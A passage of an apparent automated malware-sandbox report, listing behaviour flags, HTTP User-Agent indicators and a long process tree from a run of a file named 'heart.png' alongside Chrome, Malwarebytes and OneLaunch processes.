ea17c40b549ed41b9698333ca8ad62a20076ab59696e061d7ec4b9448d98af12d461db0a194647f3ebf763c1400540a5d2b7f4b59a36bfa98876880455042b9c877f1a373c7e2da51ad8d4895ecabdac3d6cd86dafd5f3760fcd3b8838229d6c939ac43dbf821b653fa60f5daafce5b215cab5adc6bc3dd084e8ea0672b04d393278bf3e119c0ba49d9a21f3f09b0b3078dbc1dc8743febc639acac5c21cc9c78dff3b125808e6b63dec7a2c4efb8396ce0c3c69875473a473c293ff5110ac155401d8fc05b189a17f74839a49d7dc4e7b8a486f8b45f6 | C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe | N/A |
| N/A | N/A | C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe | N/A |
| N/A | N/A | C:\Program Files\Malwarebytes\Anti-Malware\assistant.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\8740-heart.png
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff9a469758,0x7fff9a469768,0x7fff9a469778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1736 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2252 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3128 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3160 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4684 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4808 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4804 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --reenable-autoupdates --system-level
C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x254,0x258,0x25c,0x234,0x260,0x7ff7ae407688,0x7ff7ae407698,0x7ff7ae4076a8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5528 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3152 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5872 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5796 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5812 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6156 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3328 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Users\Admin\Downloads\MBSetup.exe
"C:\Users\Admin\Downloads\MBSetup.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=3388 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=6752 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe"
C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe" /Service /Protected
C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5444 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:2
C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
"C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe"
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe
"C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=4780 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4904 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3672 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6952 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Malwarebytes\Anti-Malware\assistant.exe
"C:\Program Files\Malwarebytes\Anti-Malware\assistant.exe" --showdashboard
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x440 0x4e4
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-0.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-1.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-2.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-3.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-4.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-5.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-6.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-7.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-8.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-9.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-10.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-11.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-12.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-13.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-14.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-15.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-16.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-17.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-18.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-19.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-20.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-21.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-22.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-23.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-24.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-25.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-26.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-27.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-28.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-29.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-30.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-31.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-32.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-33.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-34.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-35.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-36.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-37.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-38.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-39.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-40.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-41.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-42.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-43.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-44.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-45.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-46.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-47.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-48.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-49.exe
ig.exe reseed
C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe" /wac 0 /status on true /updatesubstatus none /scansubstatus none /settingssubstatus none
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=1036 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=3696 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6868 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=5672 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=6864 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6104 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=4760 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=6188 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6676 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5588 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5620 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=6996 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=4760 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5884 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5988 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=5884 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=3684 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=7140 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=6012 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=6768 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=4972 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=6744 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
